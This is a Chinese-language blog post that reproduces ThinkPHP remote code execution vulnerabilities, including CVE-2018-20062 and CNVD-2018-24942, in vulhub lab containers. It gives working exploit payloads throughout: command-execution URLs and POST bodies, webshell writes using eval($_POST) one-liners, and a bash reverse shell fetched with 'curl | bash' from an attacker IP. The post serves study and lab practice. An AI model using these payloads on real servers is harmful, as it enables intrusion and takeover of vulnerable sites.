ThinkPHP历史漏洞

已于 2023-01-16 16:38:04 修改
阅读量5.8k 收藏 15
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全 Thinkphp 渗透测试 php
于 2022-12-30 15:04:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44971640/article/details/128495915
版权

文章目录

ThinkPHP简介

Thinkphp 是一种开源框架。是一个由国人开发的支持windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。
很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。

Thinkphp历史漏洞

版本漏洞类型
ThinkPHP3.2.3缓存函数设计缺陷可导致Getshell
ThinkPHP3.2.3最新版update注入漏洞
ThinkPHP3.2.Xfind_select_delete注入
ThinkPHP3.Xorder_by注入漏洞
ThinkPHP5.0.Xsql注入漏洞
ThinkPHP5.0.10缓存函数设计缺陷可导致Getshell
ThinkPHP5SQL注入漏洞&&敏感信息泄露
ThinkPHP5.Xorder_by注入漏洞
ThinkPHP5.X远程代码执行

Thinkphp 2.x 任意代码执行漏洞

漏洞描述

漏洞产生的原因是因为ThinkPHP 2.x版本中,使用preg_replace (‘正则规则’,‘替换字符’,‘目标字符’)的/e(可执行模式)模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

影响版本

ThinkPHP 2.x

ThinkPHP 3.0

漏洞复现

vulhub

docker-compose up -d

docker ps

访问靶场地址 http://yourip:8080

使用POC验证漏洞

http://192.168.88.130:8080/index.php?s=/index/index/xxx/${@phpinfo()}

phpinfo被执行成功,那么试一试webshell

http://192.168.88.130:8080/index.php?s=/index/index/xxx/${${@eval($_POST[111])}}

蚁剑连接

Thinkphp5.0.23远程代码执行漏洞(CVE-2018-20062)

漏洞描述

ThinkPHP5.0.23版本的漏洞:获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

影响版本

Thinkphp 5.0.0~ 5.0.23

漏洞复现

vulhub

docker-compose up -d

docker ps

访问靶场地址

判断是否存在漏洞,访问/index.php?s=captcha页面,会出现报错

利用post请求,执行whoami命令,id,pwd等系统命令,都会回显到页面上来

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

使用echo命令写入webshell,需要将一句话木马进行base64编码

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n
YWE8P3BocCBAZXZhbCgkX1BPU1RbJ2NtZCddKTs/PmM= | base64 -d > shell.php

发送post请求,访问shell.php 文件

进入服务端查看是否上传成功

bash反弹shell操作

在攻击机新建一个xx.sh文件,写入bash反弹shell的命令。

bash -i >& /dev/tcp/192.168.88.128/6666 0>&1

#IP为攻击机的ip,端口自定义

攻击机上开启http服务保证,目标机器可以访问到xx.sh反弹shell文件

python3 -m http.server 80

攻击机开启监听6666端口

nc -lvvp 6666

使用post请求,发送以下poc

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl 192.168.88.128/thinkphp5.0.23.sh | bash

查看监听端口,发现成功反弹

ThinkPHP 5.0.x 未开启强制路由导致的RCE 漏洞分析(CNVD-2018-24942)

漏洞描述

框架对传入的路由参数过滤不严格,导致攻击者可以操作非预期的控制器类来远程执行代码。

影响版本

ThinkPHP 5.0.5-5.0.22
5.1.0-5.1.30

漏洞复现

vulhub


docker-compose up -d 

docker ps

访问靶场,即可搭建成功

写入POC

index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=-1

远程命令执行,POC

/index.php?
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&v
ars[1][]=whoami

写入webshell

/index.php?
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[ccc]);?>

/index.php?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n
bash反弹shell命令得base64编码 | base64 -d > shell9.php

渗透测试小白
关注
  • 4
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现
千寻的博客
12-19 5305
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备漏洞发现漏洞复现(数据包)漏洞复现(工具)修复建议摘抄免责声明 漏洞名称 ThinkPHP 5.0.23 远程代码执行漏洞 漏洞编号 CVE-2018-20062 漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在
过去一年网络安全的首要威胁是什么?来看看这个报告
jklbnm12的博客
07-13 296
2021年2月,IBM安全团队 X-Force发布了《2021威胁情报指数》,报告显示,漏洞利用成为2020年的首要威胁。 对攻击者来说,寻找和利用网络中未打补丁的问题或常见的漏洞和暴露(CVE)是成功率最高的方法,这也是最常见的获得网络初始访问权的途径。 事实上,漏洞利用的成功率已经超过了钓鱼邮件,在很大程度上取代了凭证窃取,成为攻击者渗透网络的最可靠方法。 现状:新漏洞虽多,但旧漏洞威胁更大 X-Force数据显示,Citrix服务器的目录遍历漏洞CVE-2019-19871)是2020年被利用最多
ThinkPHP漏洞大全
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
探索安全边界:深度剖析ThinkphpRCE扫描神器
最新发布
gitblog_00018的博客
05-28 435
探索安全边界:深度剖析ThinkphpRCE扫描神器 项目地址:https://gitcode.com/sukabuliet/ThinkphpRCE 在网络安全的浩瀚宇宙中,每一个漏洞都是潜在的黑洞,稍有不慎,便能吞噬大量的数据与安全。今天,我们将聚焦于一个专为ThinkPHP框架设计的安全审计工具——ThinkphpRCE。这不仅仅是一个脚本,它是开发者和安全研究者手中的盾牌,是对抗远程代码执行...
从0认识+识别+掌握thinkphp漏洞(超详细看完拿捏tp)文末带工具
milu_Sec的博客
12-30 3441
国人开发的框架,上手简单,开发成本低,搭建容易所以,tp框架常见于一些违法网站上面tp版本信息文档中心 · ThinkPHP 这是tp的官方文档,包含了框架一些基本知识,一些必要的知识我会在复现过程中一一讲解,不过还是建议自己去看一下文档。
ThinkPHP框架漏洞 远程代码执行/SQL注入/信息泄露复现(附检测工具)
告白的博客
02-24 4865
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。
thinkphp 5-rce版本漏洞复现(超详细版)
精品博客,你值得一看~
08-06 8518
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码。(3)还可以将php代码写入文件, 此处我们写一个phpinfo。(1)在url输出关于 PHP 配置的信息。说明存在远程命令执行漏洞!ip a #获取自己的本机 ip。(4)查看shell.php内容。直接访问 ip+端口。
ThinkPHP-Vuln-master.zip
08-05
ThinkPHP历史漏洞详解》 ThinkPHP,作为国内广泛应用的PHP框架,以其简洁、高效的特性深受开发者喜爱。然而,随着其广泛使用,安全问题也逐渐浮出水面。本篇文章将聚焦于"ThinkPHP-Vuln-master.zip"这个压缩包中...
thinkphp5.0.24完整代码,解压后直接使用
06-23
5. `CHANGELOG.md` 记录了版本的变更历史,便于开发者了解每次升级带来的新特性或修复的问题。 6. `README.md` 是项目的基本说明文件,通常包含项目的简介、安装指南、使用方法等信息。 7. `build.php` 文件可能...
thinkphp开发ai网址导航源码最新版本2.0.29.rar
08-15
AI网址导航系统利用人工智能算法,对用户浏览历史、兴趣偏好等数据进行分析,从而实现个性化的网站推荐。系统可能包含以下组件: - **数据收集**:通过用户行为追踪,收集用户的浏览记录。 - **数据分析**:运用...
Thinkphp3.23 Flash头像上传解压即可使用
03-24
尽管现在Flash已逐渐被淘汰,但了解这种历史技术有助于我们更好地理解Web发展的历程,并且在某些旧项目中仍然有其价值。随着HTML5的发展,现代的文件上传通常使用更安全、更兼容的File API,这仍然是一个值得学习的...
ThinkPhp日志文件遍历工具.zip
06-22
漏洞利用,目录扫描。。
易酷CMS v2.5.zip
07-07
1:内核安全稳定(基于ThinkPhp框架开发/PHP MYSQL架构/Jquery类包/超强的负载能力与缓存/UTF8编码) 2:安装使用简单(一健安装/一键采集/一键备份/一键切换动静态模式/操作简便/灵活实用) 3:网站运营全面(支持免费...
2019最新千月影视分销全解密影视系统源码 双端带可运营带视频教程
04-10
源码无漏洞是这个项目的一大优点,意味着在安全性和稳定性方面已经经过了良好的测试和优化。对于小白开发者来说,这意味着即使没有深厚的技术背景,也能通过提供的视频教程快速上手操作。后台管理系统简单易用,让...
UKcms内容管理系统 v1.1.8
09-03
采用phpExcel,支持自定义模型的excel数据导入,让逐条添加数据的痛苦成为历史,无论是数据采集还是手动整理添加都更为方便。 利于SEO优化 关键词和内容的excel批量导入、随机内容、定时发布、动态sitemap、主动+...
php_WSTMall v1.0.zip.zip
09-25
PHP通过预处理语句和参数绑定来防止这类攻击,而WSTMall在开发时也遵循最佳安全实践,如输入验证、输出过滤,以及定期的安全更新和漏洞修复。 文件"output.txt"可能包含了安装指南、使用说明或者运行WSTMall v1.0的...
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2316
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
vulhub thinkPHP5 SQL注入&&敏感信息泄露漏洞复现
weixin_53696027的博客
05-22 713
关于vulhub中thinkPHP SQL注入的漏洞复现及其简单的原理介绍
mysql中添加字段
热门推荐
m0_54850467的博客
09-11 4万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
thinkphp 历史漏洞
03-01
在过去的几年中,该框架曾发现过多个漏洞,包括历史漏洞。其中一些漏洞可能会导致应用程序被黑客攻击,因此用户应该时刻关注最新的漏洞信息,并及时升级和修复应用程序。如果您需要更详细的信息,建议您咨询相关的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试小白

如果您觉得满意,一分一毛也是爱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值